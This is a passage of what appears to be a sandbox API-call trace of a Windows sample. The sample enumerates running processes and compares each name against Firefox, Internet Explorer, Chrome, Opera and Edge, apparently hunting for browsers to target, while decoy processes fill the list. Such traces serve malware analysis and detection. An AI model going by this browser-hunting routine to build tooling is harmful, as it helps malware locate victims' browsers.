th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0260.192] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0260.192] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0260.192] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0260.192] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0260.192] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.192] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0260.193] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0260.193] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0260.193] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0260.193] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0260.193] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.193] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0260.193] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0260.193] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0260.193] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0260.193] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0260.193] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.193] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.194] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0260.194] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0260.194] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0260.194] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0260.194] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.194] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.194] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0260.194] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0260.194] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0260.194] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0260.194] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.194] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.195] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0260.195] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0260.195] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0260.195] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0260.195] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.195] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.196] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0260.196] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0260.196] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0260.196] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0260.196] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.196] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.196] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0260.196] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0260.196] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0260.196] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0260.196] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.196] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0260.197] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0260.197] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0260.197] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0260.197] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0260.197] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.197] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.197] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0260.197] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0260.197] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0260.197] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0260.197] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.197] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.198] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0260.198] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0260.198] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0260.198] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0260.198] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.198] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0260.199] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0260.199] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0260.199] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0260.199] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0260.199] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.199] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0260.199] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0260.199] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0260.199] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0260.199] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0260.199] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.199] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0260.200] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0260.200] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0260.200] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0260.200] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0260.200] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.200] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.200] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0260.200] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0260.200] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0260.200] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0260.200] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.200] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0260.201] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0260.201] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0260.201] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0260.201] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0260.201] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.201] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0260.202] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0260.202] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0260.202] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0260.202] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0260.202] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.202] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0260.202] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0260.202] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0260.202] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0260.202] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0260.202] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.202] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0260.203] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0260.203] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0260.203] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0260.203] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0260.203] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.203] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0260.203] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0260.203] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0260.203] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0260.204] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0260.204] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.204] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0260.204] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0260.204] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0260.204] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0260.204] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0260.204] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.204] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0260.205] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0260.205] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0260.205] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0260.205] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0260.205] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.205] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0260.205] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0260.205] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0260.205] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0260.205] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0260.205] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.205] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0260.206] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0260.206] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0260.206] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0260.206] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0260.206] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.206] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0260.206] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0260.206] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0260.206] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0260.207] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0260.207] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.207] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0260.207] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0260.207] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0260.207] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0260.207] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0260.207] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.207] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0260.208] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0260.208] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0260.208] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0260.208] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0260.208] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.208] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0260.208] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0260.208] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0260.208] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0260.208] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0260.208] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.208] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0260.209] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0260.209] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0260.209] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0260.209] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0260.209] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.209] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0260.209] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0260.209] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0260.209] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0260.210] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0260.210] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.210] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0260.210] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0260.210] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0260.210] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0260.210] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0260.210] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.210] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0260.211] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0260.211] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0260.211] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0260.211] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0260.211] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.211] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0260.211] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0260.211] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0260.211] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0260.211] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0260.211] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.211] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0260.212] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0260.212] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0260.212] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0260.212] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0260.212] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.212] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0260.212] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0260.212] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0260.212] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0260.213] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0260.213] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.213] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0260.213] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0260.213] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0260.213] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0260.213] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0260.213] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.213] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0260.214] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0260.214] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0260.214] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 